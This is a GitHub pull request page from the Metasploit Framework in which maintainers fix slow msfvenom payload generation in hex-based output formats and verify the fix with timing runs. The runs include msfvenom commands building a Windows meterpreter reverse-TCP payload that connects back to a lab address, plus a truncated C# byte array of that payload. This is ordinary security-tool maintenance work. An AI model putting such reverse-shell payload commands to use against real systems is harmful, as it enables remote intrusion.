Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix slow msfvenom payload generation for large payloads when outputting as hex format #17368

Merged
merged 1 commit into from Dec 13, 2022
Merged

Fix slow msfvenom payload generation for large payloads when outputting as hex format #17368

merged 1 commit into from Dec 13, 2022

Conversation

adfoster-r7
Copy link
Contributor

Fix slow msfvenom payload generation for large payloads when outputting as hex format

Pulls in rapid7/rex-text#59
Fixes #17245

Verification

Master:

$ time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
...
-- 333.91s user 24.30s system 99% cpu 5:59.45 total

This branch:

$ time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
...
-- 7.25s user 6.48s system 95% cpu 14.376 total

@gwillcox-r7 gwillcox-r7 self-assigned this Dec 13, 2022
@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Dec 13, 2022
@gwillcox-r7
Copy link
Contributor

Before:

I gave up waiting cause geezus it was slow as heck:

  │  ~/git/metasploit-framework │   master *1 ?16  time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload

^CError: 
./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -  948.64s user 6.28s system 90% cpu 17:40.55 total
  │  ~/git/metasploit-framework │   master *1 ?16 

After:

  │  ~/git/metasploit-framework │   land-pr17368:pr/17368 *1 ?16  time ./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 175686 bytes
Final size of csharp file: 893104 bytes
byte[] buf = new byte[175686] {0x4d,0x5a,0xe8,0x00,0x00,
0x00,0x00,0x5b,0x52,0x45,0x55,0x89,0xe5,0x81,0xc3,0x56,0x45,
0x00,0x00,0xff,0xd3,0x81,0xc3,0xa3,0x64,0x02,0x00,0x53,0x6a,
0x04,0x50,0xff,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
*cut for brevity*
0x00,0x00,0x00,0x2c,0x01,0x00,0x00,0x10,0x0e,0x00,0x00,0x0a,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,
0xff};
./msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -  21.51s user 3.48s system 94% cpu 26.393 total
  │  ~/git/metasploit-framework │   land-pr17368:pr/17368 *1 ?16

@gwillcox-r7
Copy link
Contributor

LGTM, will land this now.

@gwillcox-r7 gwillcox-r7 merged commit c7ed5f4 into rapid7:master Dec 13, 2022
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Dec 13, 2022
edited by adfoster-r7

Release Notes

Fixes a regression issue with msfvenom payload generation for large payloads taking more than 5 minutes to generate when outputting as hex format. Now it takes a few seconds as normal.

@adfoster-r7 adfoster-r7 deleted the fix-slow-msfvenom-payload-generation-for-large-payloads branch December 13, 2022 10:11
@adfoster-r7 adfoster-r7 added bug rn-fix release notes fix and removed enhancement rn-enhancement release notes enhancement labels Dec 13, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@gwillcox-r7 gwillcox-r7

Labels
bug rn-fix release notes fix
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

msfvenom did not generate stageless meterpreter in c
2 participants
@adfoster-r7 @gwillcox-r7